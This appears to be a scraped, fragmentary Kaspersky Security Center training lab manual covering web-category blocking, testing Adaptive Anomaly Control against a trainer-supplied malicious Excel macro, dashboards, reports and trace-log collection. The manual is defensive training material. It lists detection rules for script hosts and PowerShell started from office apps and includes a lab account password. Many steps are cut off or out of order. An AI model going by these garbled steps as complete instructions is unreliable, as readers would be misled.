select
Cryptocurrencies and
mining
13. Click OK
14. Select the option Apply

to individual users and
/ or groups
15. Click Add
16. In the search box, type

everyone
17. Choose the respective
group
18. Click Select
19. Add scheduling. In the

Rule schedule area,
click Always
20. Create a new schedule:

Click Add
21. Type Business hours

for the rule name
22. Configure the schedule
to block access to social
networks Monday to
Friday from 9:00 a.m. to
6:00 p.m.
23. Click OK
L–119
Lab 18.
24. Select the schedule

Business hours
25. Click OK

Cryptocurrencies
blocking rule has been
created
27. Click OK
policy
enforced
Task B: Test whether access to cryptocurrency exchange websites is

blocked
In this task, we will make sure that the rule is applied, and the Cryptocurrencies and mining category is blocked.

30. Log on to the abc\Tom account. Password—

Ka5per5Ky
31. Start Internet Explorer
32. Go to www.coinmarketcap.com
33. Make sure that the rule blocks access to social networks
34. Close the Internet Explorer window
Task C: Consult reports in Kaspersky Security Center


Center Web Console
36. Switch to Monitoring &
Reporting | Event
Selections
37. Select Recent events
38. Click Start
39. Open the last event from

Tom-Laptop
40. Note that Web Control

blocked access to website
www.coinmarketcap.com
Conclusion
In this lab, we studied the functionality that blocks access to websites. Access can be allowed or blocked by content category,
data type, or both. Access can be blocked during a specified time period only and be applied to user groups or specific users. A
typical use example for this functionality is blocking access to social networks, executable files, or external email, through
which information may leak, and/or infected objects can be downloaded.
L–121
Lab 19.
How to configure Adaptive Anomaly Control
Lab 19.
Center. A new component has appeared in the product that permits monitoring scripts and macros and detecting system
anomalies. You have decided to test health of this protection component. For this purpose, you will use an *.xlsx file with a
macro that contains an obfuscated PowerShell script prepared beforehand.
1. Configure blocking macros and scripts in office documents

2. Make sure that Adaptive Anomaly Control blocks a malicious macro
3. Configure Exploit prevention to block malicious macros
Task A: Configure blocking macros and scripts in office documents
Disable all main protection components.
By default, the Adaptive Anomaly Control protection component works in the statistics mode at first and collects data about
started programs and scripts. To test how the component detects malicious files, switch it to the block mode manually.

1. Open Kaspersky
Security Center Web
Console
& Profiles
3. Open the policy
Kaspersky Endpoint
(11.1.0)
4. Switch to the
tab
5. Disable Exploit
Prevention
6. Select Security
Controls
7. Open the settings of the
Adaptive Anomaly
Control component
8. Click the Rules link to

configure detection
rules
9. Expand the list of rules Activity of office applications

10. Switch the rules to the block mode: Change the action from Smart to Block for the following rules:
— Start of Microsoft Console Based Script Host from office application
— Start of Microsoft Windows Based Script Host from office application
— Start of Microsoft Windows Command Processor from office application
— Start of Microsoft PowerShell from office application
— Start of embedded file from office application
L–123
Lab 19.

OK and Save
12. Confirm that you want
settings: Click Yes
applied
Task B: Make sure that Adaptive Anomaly Control blocks a malicious macro
Send a message with an attachment that contains a malicious script and make sure that the file will be blocked.

14. Run Microsoft Outlook

— Specify the addressee. In the To: field, type [email protected]
— In the Subject: box, type Weekly report
— Attach the Weekly_report.xlsm file to the message (ask
the trainer where it is located)
16. Dispatch the message: Click Send
17. Run Microsoft Outlook

18. Open the Weekly
report.xlsm attachment
19. In the Microsoft Excel

window, click Enable
Editing

Content
21. Make sure that a message informing about

prohibited PowerShell.exe start has appeared
22. Click OK
23. Make sure that it was Kaspersky Endpoint

Security that blocked the action
L–125
Lab 19.
24. Open the application report

25. Select Adaptive Anomaly Control
26. Find and read the event about a blocked action
27. Close the Microsoft Excel window
Task C: Configure Exploit Prevention to block malicious macros
In the Kaspersky Endpoint Security policy, enable the Exploit Prevention and Behavior Detection components, and change the
Adaptive Anomaly Control rules’ operation mode.

28. Open Kaspersky

Security Center Web
Console
& Profiles
30. Open the policy
Kaspersky Endpoint
(11.1.0)
31. Switch to the

tab
32. Select Security
Controls
33. Open the settings of the
Adaptive Anomaly
Control component
34. Click the Rules link to

configure detection
rules
35. Expand the list of rules Activity of office applications

36. Change the action from Block to Smart for the following rules:
— Start of Microsoft Console Based Script Host from office application
— Start of Microsoft Windows Based Script Host from office application
— Start of Microsoft Windows Command Processor from office application
— Start of Microsoft PowerShell from office application
— Start of embedded file from office application
37. Click OK twice

L–127
Lab 19.

Protection, select
Exploit Prevention
39. Enable the Exploit

Prevention component
40. Click OK
41. In a similar manner,

enable Behavior
Detection
policy
settings: Click Yes
applied
45. Open Microsoft

Outlook
46. Open the Weekly
report.xlsm attachment
in Microsoft Excel

Editing

Content
L–129
Lab 20.
How to configure the dashboard
49. Make sure that a message informing about

prohibited PowerShell start has appeared
50. Click OK

52. Switch to the report of the Exploit Prevention
component
53. Make sure that the exploit was detected and
blocked
54. Close Microsoft Excel and Microsoft Outlook
Conclusion
You have checked health of multitier protection against malicious macros and scripts embedded in office documents.
You can use each component individually or combine them as necessary to protect workstations.
Lab 20.
Center. In your daily routine, you open the KSC management console to monitor the status of applications. To have a quick
protection status overview, configure the dashboard to summarize the health of your systems.
Contents. In this lab, you will configure the dashboard for daily monitoring.
Task A: Add new widgets to the dashboard

1. Open the Kaspersky

Security Center Web
Console
2. Switch to the
Monitoring &
Reporting | Dashboard
tab
3. Note that Kaspersky
Security Center Web
Console has a few
preset widgets
4. To create a new widget,

click Add or restore
widget
5. Expand Update and

select Distribution of
anti-virus databases
6. Click Add
L–131
Lab 20.
7. A new widget has been

added to the page
8. Click Add or restore
widget
9. Expand Statistics of
threats and select
History of network
attacks
10. Click Add
11. To edit the widget’s

representation, click its
gear icon
12. Select Chart type:
Lines
13. Widget’s representation

has changed
Task B: Delete and rearrange widgets
Delete unnecessary widgets and rearrange the others on the dashboard.

14. In the New devices

widget, click the gear
icon and select Hide
widget
L–133
Lab 20.
15. Click OK to confirm

16. Note that the widgets
have moved to close the
gap
17. On the Most frequent

threats widget, click
the gear icon and select
Move
18. Click the Threat
activity widget that
currently takes the place
onto which you want to
move the Most
frequent threats
widget
19. The widgets have been

relocated
Conclusion
You have added the widgets that you need to the dashboard, which shows the most important information about network
protection.
Lab 21.
How to configure maintenance tools
Center. To be able to find the necessary information and react to threats quicker, delete the reports that you do not use, prepare
a virus scan task that can be started from computers’ shortcut menus, and configure weekly reports to be emailed to you.
1. Delete unnecessary reports

2. Create a report about computers infected over the previous week
3. Configure the most important reports to be emailed
Task A: Delete unnecessary reports
Delete all reports except for:

– Kaspersky Lab software version report
– Threats report
– Report on blocked runs
– Most infected computers report
– Report on users of infected devices
– Web control report
– Protection deployment report
– Network attack report
– Protection status report
– Report on file operations on removable drives
– Key usage report
– Anti-virus database usage report
1. Open Kaspersky
Security Center Web
Console
2. Switch to the
Monitoring &
Reporting | Reports
tab
3. Select the Errors
report
4. Click Delete

to delete the report:
Click OK
L–135
Lab 21.
6. Delete the following reports in a similar manner:

— Hardware report
— Report on incompatible applications
— Report on file encryption errors
— Report on blockage of access to encrypted files
— Report on device users
— Report on effective user permissions
— Report on encryption status of mass storage devices
— Report on hardware registry
— Kaspersky Lab software version report
— Report on key usage by virtual Administration Server
— Report on rights
— Report on rights about access to encrypted devices
— Report on test blocked runs
— Software updates report
— Vulnerabilities report
— Report on attacked controllers
— Report on check of programmable logic controllers (PLCs) for integrity
— Report on results of update installation of third-party software
Task B: Create a weekly report about infected computers
Rename the Report on most heavily infected devices to Monthly report on most heavily infected devices.
Create another report about infected computers, but schedule the report to be generated on a weekly basis.

7. Open the properties of

the Report on most
heavily infected
devices
8. Rename the report to
Monthly report on
most heavily infected
devices and click Save
9. Close the report window
10. Create a new report:

Click the Add button
11. Name the report Weekly

report on most heavily
infected devices
12. Expand Statistics of
threats and select
Report on most
heavily infected
devices
13. Click Next
14. Select Administration

group and then
Managed devices
15. Click Next
L–137
Lab 21.
16. Set the reporting period

to 7 days and click OK
17. In the window that

opens, click Save
Task C: Configure the most important reports to be emailed
Configure the following reports to be emailed weekly on Mondays at 10 a.m.:
— Protection status report

— Anti-virus database usage report
— Weekly report on most heavily infected devices
— Network attack report

18. Open Kaspersky

Security Center Web
Console
19. Open the Devices |
Tasks tab
20. Create a report sending
task: Click Add
21. Select Kaspersky

Security Center 11 on
the list of applications
22. For the task type,
specify Deliver reports
23. Name the task Deliver
reports
24. Click Next
25. Select the following

reports:
— Weekly report on
most heavily
infected devices
— Anti-virus database
usage report
— Network attack
report
26. Specify the delivery

method: Send reports
by email
27. Click Settings
28. In the Email address

field, type
[email protected]
29. Click OK
L–139
Lab 21.
30. Click Next
31. Click Next
32. Clear the checkbox

Open task details
when creation is
complete
33. Click Finish
34. Click the Deliver

reports link
35. Switch to the Schedule

tab
36. Set the emailing interval
to Weekly
37. Select Monday and
9:00 a.m., and click
Save
Conclusion
You have deleted unused reports, and now you will be able to find the necessary ones quicker.
Lab 22.
How to collect diagnostic information
Center. Kaspersky Endpoint Security components will not start on a corporate computer, and you’ve failed to figure out the
reasons of the incident. Collect trace logs of Kaspersky Endpoint Security to be sent to the technical support. Do it remotely
from the Administration Console.
Contents. In this lab, you will remotely collect trace logs from a computer.
Task A: Collect trace logs from a computer
Find the Alex-Desktop computer in the console and start the remote diagnostics utility from its shortcut menu. In the utility
window, enable tracing for Kaspersky Endpoint Security, restart Kaspersky Endpoint Security, and download the logs.
Additionally, download information about the computer and Windows logs: Kaspersky Event Log and System.

1. Log on to the
abc\Administrator
account, password
Ka5per5Ky
2. Start the Administration
Console
3. Go to the Managed
devices node
4. To find the Alex-
Desktop computer, run
the search utility from
the shortcut menu of the
Managed devices node
5. Type Alex-Desktop and

click Find now
L–141
Lab 22.

Alex-Desktop computer
has appeared in the
search results
7. Run the remote
diagnostics utility: On
the computer’s shortcut
menu, select Custom
tools | Remote
diagnostics

Device box contains the
name of the Alex-
Desktop computer
9. Connect the utility to
the computer: Click
Sign in
10. Enable tracing: Select Kaspersky

Endpoint Security for Windows
11. Click the link Modify tracing level
12. Leave tracing level 500 and

13. Select the checkbox Rotation-based
tracing
14. Set the Files count to 2
15. Specify the Maximum file size: 20 MB
16. Click OK
17. Restart Kaspersky Endpoint Security: Click

the link Restart application
18. Wait for Kaspersky Endpoint Security to
restart: At the bottom of the window, the
message Operation completed successfully
will appear
19. Disable tracing: Click the link Disable

tracing
20. Expand the Kaspersky Endpoint Security
for Windows | Trace files folder
21. Select the first file on the list and click the
link Download file
22. Download the other files from the Trace
files folder in a similar manner
23. Download information about the computer:

Select the System Info node
24. Click the link Download System Info
25. Expand the Event log node and save the

Kaspersky Event Log and System log in a
similar manner
26. Click the link Download folder in the
lower-left corner of the window
L–143
Lab 22.
27. Make sure that the folder contains all the

necessary logs
28. Close the diagnostics utility

29. Do not delete the folder with logs: Click
No
Conclusion
We have downloaded Kaspersky Endpoint Security trace logs and system information from the computer. Attach these logs to
the request to technical support.
You can also use the diagnostics utility if you need Network Agent logs, or logs of the update module, or installation logs, or
tracing for the Administration Server.

KL 002.11.1 en Labs v2.1.5 PDF

Uploaded by

Copyright:

Available Formats

KL 002.11.1 en Labs v2.1.5 PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

KL 002.11.1 en Labs v2.1.5 PDF

Uploaded by

Copyright:

Available Formats

Kaspersky Technical Training

Lab 12. How to configure exclusions from self-defense ............................................................................................. 75

1. Install the Kaspersky Security Center Administration Server

Task A: Install the Kaspersky Security Center Administration Server

The task is performed on Security-Center.

1. Start the Kaspersky Security Center installer (it is on the

3. On the following page, make sure that the required version of

4. Accept the License Agreement and the Privacy Policy

6. Select the Standard installation type and click Next

7. Clear the checkbox Install Kaspersky Security Center 11

8. Keep the option Fewer than 100 networked devices selected

9. Select Microsoft SQL Server and click Next

10. Click Browse

11. Select the SECURITY-CENTER\SQLEXPRESS server and

12. To proceed with the installation of Kaspersky Security

13. Select Microsoft Windows Authentication Mode and click

14. To start the installation, click Install

15. Do not select to start the Administration Console and click

Task B: Install the Web console of Kaspersky Security Center

The task is performed on Security-Center.

18. On the welcome page of the wizard, click Next

19. Accept the License Agreement and click Next

20. Do not change the destination folder

22. Specify the connection address: 127.0.0.1

25. Make sure that port 8080 is accessible at 127.0.0.1

27. Leave these settings unchanged

29. Select the option Generate new certificate

31. Make sure that SECURITY-CENTER is specified in the list

33. To start the installation, click Install

34. Close the Kaspersky Security Center 11 Web Console Setup

Task C: Proceed through the Quick Start Wizard to configure Kaspersky

The task is performed on Security-Center.

35. Start the Google

38. Enter the username

40. Skip the tutorial. Click

41. On the welcome page of

42. We will not use a proxy

43. Do not wait for the

44. To activate the

48. Make sure that 3 keys

50. Click Add to install the

51. Select the English KSC

52. Click Install Plug-in

53. Make sure that the

55. Click Next

56. Accept the KSN

57. Click Create

59. If the Network poll

60. Specify the addressee

63. Clear the Start

64. Switch to Operations |

67. Select to Deploy key

Task A: Install Kaspersky Endpoint Security for Windows on a workstation

The task is performed on Security-Center.

1. Switch to Discovery &

5. Select Do not add key

9. Choose Select devices

12. Without changing the

13. Click Next without